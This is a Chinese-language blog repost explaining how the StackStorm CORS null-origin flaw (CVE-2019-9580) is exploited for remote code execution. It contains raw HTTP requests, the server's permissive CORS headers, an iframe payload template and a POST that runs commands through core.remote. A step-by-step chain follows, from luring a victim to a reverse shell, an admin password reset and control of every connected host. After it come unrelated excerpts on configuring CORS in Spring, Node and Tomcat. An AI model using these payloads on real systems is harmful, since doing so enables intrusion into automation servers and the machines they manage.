StackStorm利用CORS null origin获得RCE (CVE-2019-9580)

在2.10.3/2.9.3之前,如果请求的来源未知,我们将返回null,null可以导致某些客户端中来自未知来源的成功请求,允许针对StackStorm API进行XSS样式攻击。

(Firefox上的用户是受害者,Chrome上的用户是攻击者)

利用null CORS

通过使用null Origin头向StackStorm API发送请求Origin:null,服务器以Access-Control-Allow-Originto 响应null

GET /api/v1/executions?action=packs.get_config&limit=5&exclude_attributes=trigger_instance&parent=null HTTP/1.1
Host: localhost:4443
Origin: 443
Referer: https://localhost:4443/
x-auth-token: a19e39b9dff24e4798ba04c7036d0275

服务器响应:

Access-Control-Allow-Origin: null <-- hug hug hug
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Authorization,X-Auth-Token,St2-Api-Key,X-Request-ID
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,X-Limit,X-Total-Count,X-Request-ID

portswigger博客文章中记录了利用null CORS ,我们可以找到以下payload:

<iframe sandbox =“allow-scripts allow-top-navigation allow-forms”src =‘data:text/html,
<script>

*注入你的恶意代码*

</ SCRIPT>‘> </ IFRAME>

如何得到RCE呢?

StackStorm允许配置操作,其中一些操作如core.remote在您选择的主机上执行任意命令。

因此,如果我们设置主机127.0.0.1,我们将在StackStorm docker上执行命令。很好,RCE应该没问题,因为发送一个简单的POST请求来注册一个动作。

POST /api/v1/executions HTTP/1.1
Host: localhost:4443
Origin: null
Content-Type: application/json
x-auth-token: a19e39b9dff24e4798ba04c7036d0275
Content-Length: 131

{"action":"core.remote","parameters":{"cmd":"touch /tmp/pwn2.txt","hosts":"127.0.0.1","cwd":"/tmp"},"context":{"trace_context":{}}}

接下来应该怎么做?

我们可以在StackStorm的主机上执行命令,但是让我们完全控制StackStorm平台。可以通过重置管理员密码来解决此问题。使用文档:

需要更改密码?运行:sudo htpasswd/etc/st2/ htpasswd st2admin

https://docs.stackstorm.com/authentication.html

OK,来理一下思路:

  1. 发送一个带有恶意代码的受害者链接,在主机127.0.0.1上行使一个新动作以执行一个arbirary命令
  2. 受害者点击链接并查看小马
  3. 由于CORS在使用标头发送请求时为空Origin: null,因此注册新操作的POST请求正在运行(我们还设置了参数credentials:"include"
  4. 操作是触发器和命令执行(反向shell)
  5. 攻击者重置管理员密码并获得对StackStorm平台的完全控制权
  6. 攻击者可以破坏注册到StackStorm的所有其他主机

原文地址:https://www.cnblogs.com/safoie/p/10547683.html

时间: 2024-10-11 12:39:41

StackStorm利用CORS null origin获得RCE (CVE-2019-9580)的相关文章

Spring 跨域问题CORS (Cross Origin Resources Share)

1.Spring给我们提供了三种跨域方法 CorsFilter 过滤器 CorsConfiguration Bean @CrossOrigin 注解 2.CorsFilter 过滤器 CorsFilter代码如下: package com.xiaobai.filter; import javax.servlet.*; import javax.servlet.annotation.WebFilter; import javax.servlet.http.HttpServletRequest; i

利用cors,实现js跨域访问Tomcat下资源

第一步:页面js代码: function createCORSRequest(method, url){ var xhr = new XMLHttpRequest(); if ("withCredentials" in xhr){ xhr.open(method, url, true); } else if (typeof XDomainRequest != "undefined"){ xhr = new XDomainRequest(); xhr.open(met

利用CORS实现跨域请求(转载)

跨域请求一直是网页编程中的一个难题,在过去,绝大多数人都倾向于使用JSONP来解决这一问题.不过现在,我们可以考虑一下W3C中一项新的特性--CORS(Cross-Origin Resource Sharing)了. 本文的所有代码均来自http://www.html5rocks.com/en/tutorials/cors/,如果您对其中的任何技术细节存在疑问,请以原文为准. 客户端 创建XmlHttpRequest对象 对于CORS,Chrome.FireFox以及Safari,需要使用Xml

[转] 利用CORS实现跨域请求

[From] http://newhtml.net/using-cors/ 跨域请求一直是网页编程中的一个难题,在过去,绝大多数人都倾向于使用JSONP来解决这一问题.不过现在,我们可以考虑一下W3C中一项新的特性--CORS(Cross-Origin Resource Sharing)了. 本文的所有代码均来自http://www.html5rocks.com/en/tutorials/cors/,如果您对其中的任何技术细节存在疑问,请以原文为准. 客户端 创建XmlHttpRequest对象

利用CORS配置实现jQuery对WebApi及MVC的跨域访问

js ajax操作中,默认不能进行跨域访问,我们可以通过CORS配置实现最简单的跨域访问.这种方式是在服务端进行跨域访问控制. 一.编写服务端代码 新建一个ASP.NET MVC/WebApi项目,在其中分别新建Api方法及MVC Action方法: WebApi方法如下: public class ValuesController : ApiController { // GET api/values public IEnumerable<string> Get() { return new

Node.js 【CORS(cross origin resource sharing) on ExpressJS之笔记】

app.use(function(req, res, next) { res.header("Access-Control-Allow-Origin", "*"); res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept"); next(); }); app.get('/', function(req,

spring 设置跨域 CORS (Cross Origin Resources Share) 跨域

Spring提供了三种方式跨域 1.CorsFilter 过滤器 2.<mvc:cors> Bean 3.@CrossOrigin注解 以上三种方式本质都是用来配置CorsConfiguration 1.CorsFilter 过滤器 首先创建一个自己的过滤器 这里我创建一个类,名字为MyCorsFilter import org.springframework.web.cors.CorsConfiguration; import org.springframework.web.cors.Url

CORS漏洞利用检测和利用方式

CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访问网站 curl https://www.huasec.com -H "Origin: https://test.com" -I 检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com 2.burpsuite发送请求包,查看返回包

CSRF &amp; CORS

下面转的两篇文章分别说明了以下两个概念和一些解决方法: 1. CSRF - Cross-Site Request Forgery - 跨站请求伪造 2. CORS - Cross Origin Resourse-Sharing - 跨站资源共享 (1. CSRF)转自:http://www.h3c.com.cn/About_H3C/Company_Publication/IP_Lh/2012/04/Home/Catalog/201208/751467_30008_0.htm 从下面文章中可以知道